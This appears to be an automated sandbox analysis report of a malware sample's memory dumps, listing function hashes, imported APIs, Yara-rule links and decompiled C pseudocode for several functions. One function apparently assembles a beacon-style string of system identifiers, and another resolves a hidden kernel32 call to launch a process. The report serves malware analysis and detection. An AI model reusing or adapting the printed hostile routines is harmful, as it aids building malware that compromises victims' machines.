Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 20219072900204ABCB14EF68CC91DBBBBE5FF45350B4681A8E955AB245D7B0FA15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E140E3F, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.474452249.000000006E140000.00000040.00020000.sdmp, Offset: 6E140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 59d6805cdd1322230450fab32b81279a372a6666e941fc94409a7b349c142bc8
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 35118173340201DFD754CE9ADC91E9673AAEBA9330B258066ED08DB305E676E852D760

Uniqueness

Uniqueness Score: -1.00%

Function 6E141238, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.474452249.000000006E140000.00000040.00020000.sdmp, Offset: 6E140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 14371fdedb563423f4cc4d83bafeffb19a43f83b1f1e6b15f63b3102ad3487e8
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 59012237354202CFD744CB6DD990D6AB7E4EBD1320B39807EC406C7715D220E889C920

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5E79, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00BB5E79(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0xbbd018; // 0xd4967592
				asm("bswap eax");
				_t27 =  *0xbbd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0xbbd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0xbbd00c; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0xbbd2a4; // 0x2a5a5a8
				_t3 = _t30 + 0xbbe633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d153, _t29, _t28, _t27, _t26,  *0xbbd02c,  *0xbbd004, _t25);
				_t33 = E00BBA358();
				_t34 =  *0xbbd2a4; // 0x2a5a5a8
				_t4 = _t34 + 0xbbe673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E00BB5369(_t91);
				if(_t96 != 0) {
					_t83 =  *0xbbd2a4; // 0x2a5a5a8
					_t6 = _t83 + 0xbbe8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0xbbd238, 0, _t96);
				}
				_t97 = E00BBA0B7();
				if(_t97 != 0) {
					_t78 =  *0xbbd2a4; // 0x2a5a5a8
					_t8 = _t78 + 0xbbe8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0xbbd238, 0, _t97);
				}
				_t98 =  *0xbbd32c; // 0x36195b0
				_a32 = E00BB3802(0xbbd00a, _t98 + 4);
				_t42 =  *0xbbd2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0xbbd2a4; // 0x2a5a5a8
					_t11 = _t74 + 0xbbe8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0xbbd2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0xbbd2a4; // 0x2a5a5a8
					_t13 = _t71 + 0xbbe8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0xbbd238, 0, 0x800);
					if(_t100 != 0) {
						E00BB10BF(GetTickCount());
						_t50 =  *0xbbd32c; // 0x36195b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0xbbd32c; // 0x36195b0
						__imp__(_t54 + 0x40);
						_t56 =  *0xbbd32c; // 0x36195b0
						_t103 = E00BB61B9(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0xbbc2ac);
							_push(_t103);
							_t62 = E00BBA755();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E00BB1596(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E00BB14EF();
								}
								HeapFree( *0xbbd238, 0, _v44);
							}
							HeapFree( *0xbbd238, 0, _t103);
						}
						HeapFree( *0xbbd238, 0, _t100);
					}
					HeapFree( *0xbbd238, 0, _a24);
				}
				HeapFree( *0xbbd238, 0, _t105);
				return _a12;
			}

0x00bb5e79
0x00bb5e79
0x00bb5e79
0x00bb5e7e
0x00bb5e84
0x00bb5e8e
0x00bb5e90
0x00bb5e90
0x00bb5e9d
0x00bb5ea8
0x00bb5eab
0x00bb5eb6
0x00bb5eb9
0x00bb5ebe
0x00bb5ec1
0x00bb5ec6
0x00bb5ec9
0x00bb5ed5
0x00bb5ee2
0x00bb5ee4
0x00bb5eea
0x00bb5eef
0x00bb5efa
0x00bb5efc
0x00bb5eff
0x00bb5f06
0x00bb5f0a
0x00bb5f0c
0x00bb5f11
0x00bb5f1d
0x00bb5f1f
0x00bb5f2b
0x00bb5f2d
0x00bb5f2d
0x00bb5f38
0x00bb5f3c
0x00bb5f3e
0x00bb5f43
0x00bb5f4f
0x00bb5f51
0x00bb5f5d
0x00bb5f5f
0x00bb5f5f
0x00bb5f65
0x00bb5f78
0x00bb5f7c
0x00bb5f83
0x00bb5f86
0x00bb5f8b
0x00bb5f96
0x00bb5f98
0x00bb5f9b
0x00bb5f9b
0x00bb5f9d
0x00bb5fa4
0x00bb5fa7
0x00bb5fac
0x00bb5fb6
0x00bb5fb8
0x00bb5fc0
0x00bb5fd9
0x00bb5fdd
0x00bb5fe9
0x00bb5fee
0x00bb5ff7
0x00bb6008
0x00bb600c
0x00bb6015
0x00bb601b
0x00bb6028
0x00bb6035
0x00bb603b
0x00bb6047
0x00bb604d
0x00bb604e
0x00bb6053
0x00bb6059
0x00bb605f
0x00bb6066
0x00bb606d
0x00bb6073
0x00bb607a
0x00bb607e
0x00bb6089
0x00bb608e
0x00bb6094
0x00bb609d
0x00bb609d
0x00bb60ae
0x00bb60ae
0x00bb60bd
0x00bb60bd
0x00bb60cc
0x00bb60cc
0x00bb60de
0x00bb60de
0x00bb60ed
0x00bb60fe

APIs

GetTickCount.KERNEL32 ref: 00BB5E90
wsprintfA.USER32 ref: 00BB5EDD
wsprintfA.USER32 ref: 00BB5EFA
wsprintfA.USER32 ref: 00BB5F1D
HeapFree.KERNEL32(00000000,00000000), ref: 00BB5F2D
wsprintfA.USER32 ref: 00BB5F4F
HeapFree.KERNEL32(00000000,00000000), ref: 00BB5F5F
wsprintfA.USER32 ref: 00BB5F96
wsprintfA.USER32 ref: 00BB5FB6
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00BB5FD3
GetTickCount.KERNEL32 ref: 00BB5FE3
RtlEnterCriticalSection.NTDLL(03619570), ref: 00BB5FF7
RtlLeaveCriticalSection.NTDLL(03619570), ref: 00BB6015

Part of subcall function 00BB61B9: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00BB6028,?,036195B0), ref: 00BB61E4
Part of subcall function 00BB61B9: lstrlen.KERNEL32(?,?,?,00BB6028,?,036195B0), ref: 00BB61EC
Part of subcall function 00BB61B9: strcpy.NTDLL ref: 00BB6203
Part of subcall function 00BB61B9: lstrcat.KERNEL32(00000000,?), ref: 00BB620E
Part of subcall function 00BB61B9: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00BB6028,?,036195B0), ref: 00BB622B

StrTrimA.SHLWAPI(00000000,00BBC2AC,?,036195B0), ref: 00BB6047

Part of subcall function 00BBA755: lstrlen.KERNEL32(03619908,00000000,00000000,7742C740,00BB6053,00000000), ref: 00BBA765
Part of subcall function 00BBA755: lstrlen.KERNEL32(?), ref: 00BBA76D
Part of subcall function 00BBA755: lstrcpy.KERNEL32(00000000,03619908), ref: 00BBA781
Part of subcall function 00BBA755: lstrcat.KERNEL32(00000000,?), ref: 00BBA78C

lstrcpy.KERNEL32(00000000,?), ref: 00BB6066
lstrcpy.KERNEL32(00000000,00000000), ref: 00BB606D
lstrcat.KERNEL32(00000000,?), ref: 00BB607A
lstrcat.KERNEL32(00000000,00000000), ref: 00BB607E

Part of subcall function 00BB1596: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 00BB1648

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00BB60AE
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00BB60BD
HeapFree.KERNEL32(00000000,00000000,?,036195B0), ref: 00BB60CC
HeapFree.KERNEL32(00000000,00000000), ref: 00BB60DE
HeapFree.KERNEL32(00000000,?), ref: 00BB60ED

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: 2fb0b94c614cdd13d7d97324218fe983b8fac4489e6a7d6f63baa4860c3a9197
Instruction ID: 26d7a71d83c855c9bca8c01a447b0a4a81e4030e20638b794154dc7aece0ca45
Opcode Fuzzy Hash: 2fb0b94c614cdd13d7d97324218fe983b8fac4489e6a7d6f63baa4860c3a9197
Instruction Fuzzy Hash: 4F61AF31500601AFC721EB68EC49FAA7BE8EB48350F440614F908D7271EFF9E906DB66

Uniqueness

Uniqueness Score: -1.00%

Function 6E1092FA, Relevance: 19.8, APIs: 13, Instructions: 289timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6E109335

Part of subcall function 6E10B752: __getptd_noexit.LIBCMT ref: 6E10B752

__gmtime64_s.LIBCMT ref: 6E1093CE
__gmtime64_s.LIBCMT ref: 6E109404
__gmtime64_s.LIBCMT ref: 6E109421
__allrem.LIBCMT ref: 6E109477
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E109493
__allrem.LIBCMT ref: 6E1094AA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1094C8
__allrem.LIBCMT ref: 6E1094DF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1094FD
__invoke_watson.LIBCMT ref: 6E10956E
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E10957D
__aulldiv.LIBCMT ref: 6E10959D

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$Time$FileSystem__aulldiv__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 2599720210-0
Opcode ID: efc6ac646cefa49946561dc786cae5171483882cf691f7f8f7c5a827e1585cf6
Instruction ID: 760331536417768322402fe68380dcd31fc42ed4fe2e146fcec35f652f04cffe
Opcode Fuzzy Hash: efc6ac646cefa49946561dc786cae5171483882cf691f7f8f7c5a827e1585cf6
Instruction Fuzzy Hash: F291A9B1A00706ABD714DEF9CC71B9AB7ACAF85324F14856AE514DB6C0EF70D9809B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E11DCDC, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 6E11DCF3

Part of subcall function 6E10B167: __calloc_impl.LIBCMT ref: 6E10B176

__calloc_crt.LIBCMT ref: 6E11DD17
_free.LIBCMT ref: 6E11DD25
__calloc_crt.LIBCMT ref: 6E11DD33
_free.LIBCMT ref: 6E11DD43
_free.LIBCMT ref: 6E11DD49
__copytlocinfo_nolock.LIBCMT ref: 6E11DD58
__setmbcp_nolock.LIBCMT ref: 6E11DD79
_free.LIBCMT ref: 6E11DD87
___removelocaleref.LIBCMT ref: 6E11DD8E
___freetlocinfo.LIBCMT ref: 6E11DD95
_free.LIBCMT ref: 6E11DD9B

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 7373143fecbf684e373d6eca519a832cb39b6f7c8aba6a6f015d8ec12c2314cf
Instruction ID: 2ff77344f764249749dfe2d4eb841ac38127afe28d307e67ac2d5beeb3f61c62
Opcode Fuzzy Hash: 7373143fecbf684e373d6eca519a832cb39b6f7c8aba6a6f015d8ec12c2314cf
Instruction Fuzzy Hash: DF21D43510C601AEEB619FE5DC04ECA77ADEF817A9B214839E444550E4EF3198D0FF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E10AD06, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6E10AD0E
_free.LIBCMT ref: 6E10AD27

Part of subcall function 6E10AB1D: HeapFree.KERNEL32(00000000,00000000,?,6E10DD47,00000000,00000001,00000000,?,?,?,6E10A62D,6E108593), ref: 6E10AB31
Part of subcall function 6E10AB1D: GetLastError.KERNEL32(00000000,?,6E10DD47,00000000,00000001,00000000,?,?,?,6E10A62D,6E108593), ref: 6E10AB43

_free.LIBCMT ref: 6E10AD3A
_free.LIBCMT ref: 6E10AD58
_free.LIBCMT ref: 6E10AD6A
_free.LIBCMT ref: 6E10AD7B
_free.LIBCMT ref: 6E10AD86
_free.LIBCMT ref: 6E10ADAA
RtlEncodePointer.NTDLL(6E24E390), ref: 6E10ADB1
_free.LIBCMT ref: 6E10ADC6
_free.LIBCMT ref: 6E10ADDC
_free.LIBCMT ref: 6E10AE04

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: cd0c1f7b04153db5c440f1187e2507296fcb654216a58764c56bec7bff027ee9
Instruction ID: 65f4b123d99220f5cdf7a931add5cd46c4695cdff37ae057fd17f1c8ff8a8d64
Opcode Fuzzy Hash: cd0c1f7b04153db5c440f1187e2507296fcb654216a58764c56bec7bff027ee9
Instruction Fuzzy Hash: B021C972900A11DBEF11EF94D944D5A3FAABB56765360093DE8249B200CF3068C0FFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E11DDB3, Relevance: 16.6, APIs: 11, Instructions: 131COMMON

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 6E11DDEC
__calloc_crt.LIBCMT ref: 6E11DE3D
__lock.LIBCMT ref: 6E11DE53
__copytlocinfo_nolock.LIBCMT ref: 6E11DE64
_wcscmp.LIBCMT ref: 6E11DE9E
__lock.LIBCMT ref: 6E11DEB5
__updatetlocinfoEx_nolock.LIBCMT ref: 6E11DEC7
___removelocaleref.LIBCMT ref: 6E11DECD
__updatetlocinfoEx_nolock.LIBCMT ref: 6E11DEEC

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 459a2fd6764e80c51324d554872d62aed3060471a95b26e883684b011ffcf603
Instruction ID: 038bdeb24cff40f47c13a7f57fce405bfa607c141cd564eca6d3cf3e6215b4f0
Opcode Fuzzy Hash: 459a2fd6764e80c51324d554872d62aed3060471a95b26e883684b011ffcf603
Instruction Fuzzy Hash: 9641A23290C30AAFDB00DFE4D844BCE77B8AB5531AF208939E91896184DB7596C6FF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1085D7, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6E1085EA

Part of subcall function 6E10A60F: std::exception::_Copy_str.LIBCMT ref: 6E10A628

__CxxThrowException@8.LIBCMT ref: 6E1085FF

Part of subcall function 6E1095D4: RaiseException.KERNEL32(?,?,6E13D110,6E13B25C,?,?,?,?,?,6E108556,6E13D110,6E13B25C,?,00000001), ref: 6E109629

std::exception::exception.LIBCMT ref: 6E108618
__CxxThrowException@8.LIBCMT ref: 6E10862D
std::regex_error::regex_error.LIBCPMT ref: 6E10863F

Part of subcall function 6E1083AB: std::exception::exception.LIBCMT ref: 6E1083C5

__CxxThrowException@8.LIBCMT ref: 6E10864D
std::exception::exception.LIBCMT ref: 6E108666
__CxxThrowException@8.LIBCMT ref: 6E10867B

Strings

bad function call, xrefs: 6E108681

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: d7c83af803136d1c014a78ff62431d9fc7f3720dba89e5621f5b37e47a4090c1
Instruction ID: 6b50be22f34c0701859108c1f9b7dea421f1d16f557bb625ace096dae80f13e8
Opcode Fuzzy Hash: d7c83af803136d1c014a78ff62431d9fc7f3720dba89e5621f5b37e47a4090c1
Instruction Fuzzy Hash: 3411EF78C0421CBBCB00EFE5C459CCEBB7CEB44244B508866ED25A7244EB34E6899B95

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4B3D, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00BB4B3D(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xbbd33c; // 0x3619bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00BB1BF8(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xbbc1ac;
				}
				_t46 = E00BB5BBE(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00BB98E4(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xbbd2a4; // 0x2a5a5a8
						_t16 = _t75 + 0xbbeb28; // 0x530025
						 *0xbbd11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00BB1BF8(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xbbc1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00BB98E4(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00BB5DE8(_v20);
						} else {
							_t66 =  *0xbbd2a4; // 0x2a5a5a8
							_t31 = _t66 + 0xbbec48; // 0x73006d
							 *0xbbd11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00BB5DE8(_v12);
				}
				return _v24;
			}

0x00bb4b45
0x00bb4b4b
0x00bb4b52
0x00bb4b58
0x00bb4b5c
0x00bb4b60
0x00bb4b63
0x00bb4b68
0x00bb4b6d
0x00bb4b6f
0x00bb4b6f
0x00bb4b78
0x00bb4b7d
0x00bb4b82
0x00bb4b88
0x00bb4b92
0x00bb4b9b
0x00bb4ba2
0x00bb4bbb
0x00bb4bc0
0x00bb4bc5
0x00bb4bce
0x00bb4bd7
0x00bb4be8
0x00bb4bf1
0x00bb4bf5
0x00bb4bf9
0x00bb4bfe
0x00bb4c03
0x00bb4c05
0x00bb4c05
0x00bb4c0f
0x00bb4c18
0x00bb4c1f
0x00bb4c37
0x00bb4c3b
0x00bb4c78
0x00bb4c3d
0x00bb4c40
0x00bb4c48
0x00bb4c59
0x00bb4c65
0x00bb4c6d
0x00bb4c71
0x00bb4c71
0x00bb4c3b
0x00bb4c80
0x00bb4c85
0x00bb4c8c

APIs

GetTickCount.KERNEL32 ref: 00BB4B52
lstrlen.KERNEL32(?,80000002,00000005), ref: 00BB4B92
lstrlen.KERNEL32(00000000), ref: 00BB4B9B
lstrlen.KERNEL32(00000000), ref: 00BB4BA2
lstrlenW.KERNEL32(80000002), ref: 00BB4BAF
lstrlen.KERNEL32(?,00000004), ref: 00BB4C0F
lstrlen.KERNEL32(?), ref: 00BB4C18
lstrlen.KERNEL32(?), ref: 00BB4C1F
lstrlenW.KERNEL32(?), ref: 00BB4C26

Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 571a6091a26ced298a776cddfe392a0bb5ff1f7c1e0148e31e0ac70ab50d75a0
Instruction ID: 77f7b7a6eb48c705c7f2b559a3a99e1b01f7dfebb89f4bdcefec4b65c5c579bd
Opcode Fuzzy Hash: 571a6091a26ced298a776cddfe392a0bb5ff1f7c1e0148e31e0ac70ab50d75a0
Instruction Fuzzy Hash: 94414C72900119EBCF11AFA8CD099EEBFB5FF44354F154191F904A7222EBB5DA11EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5CB0, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00BB5CB0(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00BB8C20(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E00BBA899( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0xbbd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0xbbd2a4; // 0x2a5a5a8
					_t18 = _t47 + 0xbbe3e6; // 0x73797325
					_t68 = E00BB93FD(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0xbbd2a4; // 0x2a5a5a8
						_t19 = _t50 + 0xbbe747; // 0x3618cef
						_t20 = _t50 + 0xbbe0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00BB91D9();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00BB91D9();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xbbd238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00BB5DE8(_t70);
				goto L12;
			}

0x00bb5cb8
0x00bb5cb8
0x00bb5cc7
0x00bb5cce
0x00bb5cd3
0x00bb5de0
0x00bb5de7
0x00bb5de7
0x00bb5ce2
0x00bb5cea
0x00bb5ced
0x00bb5cf2
0x00bb5d07
0x00bb5d0d
0x00bb5d0e
0x00bb5d11
0x00bb5d17
0x00bb5d1a
0x00bb5d1f
0x00bb5d27
0x00bb5d33
0x00bb5d37
0x00bb5dc7
0x00bb5d3d
0x00bb5d3d
0x00bb5d42
0x00bb5d49
0x00bb5d5d
0x00bb5d61
0x00bb5db0
0x00bb5d63
0x00bb5d64
0x00bb5d6b
0x00bb5d84
0x00bb5d86
0x00bb5d8a
0x00bb5d91
0x00bb5dab
0x00bb5d93
0x00bb5d9c
0x00bb5da1
0x00bb5da1
0x00bb5d91
0x00bb5dbf
0x00bb5dbf
0x00bb5d37
0x00bb5dce
0x00bb5dd7
0x00bb5ddb
0x00000000

APIs

Part of subcall function 00BB8C20: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00BB5CCC,?,00000001,?,?,00000000,00000000), ref: 00BB8C45
Part of subcall function 00BB8C20: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00BB8C67
Part of subcall function 00BB8C20: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00BB8C7D
Part of subcall function 00BB8C20: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00BB8C93
Part of subcall function 00BB8C20: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00BB8CA9
Part of subcall function 00BB8C20: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00BB8CBF

memset.NTDLL ref: 00BB5D1A

Part of subcall function 00BB93FD: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00BB197C,63699BCE,00BB89EF,73797325), ref: 00BB940E
Part of subcall function 00BB93FD: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00BB9428

GetModuleHandleA.KERNEL32(4E52454B,03618CEF,73797325), ref: 00BB5D50
GetProcAddress.KERNEL32(00000000), ref: 00BB5D57
HeapFree.KERNEL32(00000000,00000000), ref: 00BB5DBF

Part of subcall function 00BB91D9: GetProcAddress.KERNEL32(36776F57,00BB5762), ref: 00BB91F4

CloseHandle.KERNEL32(00000000,00000001), ref: 00BB5D9C
CloseHandle.KERNEL32(?), ref: 00BB5DA1
